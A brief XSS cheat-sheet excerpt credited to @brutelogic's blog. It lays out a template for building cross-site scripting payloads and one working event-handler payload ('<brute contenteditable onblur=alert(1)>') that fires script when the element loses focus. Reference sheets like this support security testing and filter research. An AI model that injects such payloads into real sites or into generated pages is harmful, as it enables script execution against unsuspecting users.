Credit: @brutelogic (blog)

Summary

A quick reference to the XSS payloads and schemes used across all posts.

XSS Payload Scheme

extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3

Agnostic Event Handlers

<brute contenteditable onblur=alert(1)>lose focus!